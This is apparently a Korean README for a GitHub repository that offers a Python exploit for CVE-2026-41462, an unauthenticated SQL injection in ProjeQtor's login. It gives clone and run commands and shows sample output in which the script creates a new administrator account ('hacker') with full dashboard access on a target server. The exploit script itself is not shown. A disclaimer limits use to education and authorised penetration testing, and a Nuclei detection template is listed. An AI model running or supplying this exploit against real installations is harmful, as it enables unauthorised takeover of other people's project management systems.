
CVE-2026-41462
ProjeQtor ≤ 12.4.3의 치명적인 인증되지 않은 SQL 인젝션
CVE-2026-41462는 ProjeQtor 프로젝트 관리 도구의 로그인 기능에서 발견된 치명적인 인증되지 않은 SQL 인젝션 취약점입니다.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
익스플로잇이 성공하면 다음과 유사한 출력이 표시됩니다:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
브라우저를 열고 다음으로 이동합니다:
http://target.com/login.php
스크립트 출력에 표시된 자격 증명으로 로그인합니다.
성공하면 전체 관리 권한으로 ProjeQtor 관리자 대시보드에 접속하게 됩니다.
성공 지표:
| 파일 | 설명 |
|---|---|
CVE-2026-41462.py | 기본 익스플로잇 스크립트 |
CVE-2026-41462.yaml | Nuclei 탐지 템플릿 |
README.md | 이 문서 |
저장소를 클론합니다:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
익스플로잇을 실행합니다:
python3 CVE-2026-41462.py -u http://target.com --create-admin
새로 생성된 관리자 계정으로 로그인합니다.
이 도구는 교육 목적 및 승인된 침투 테스트용으로만 제작되었습니다. 승인되지 않은 사용은 불법입니다.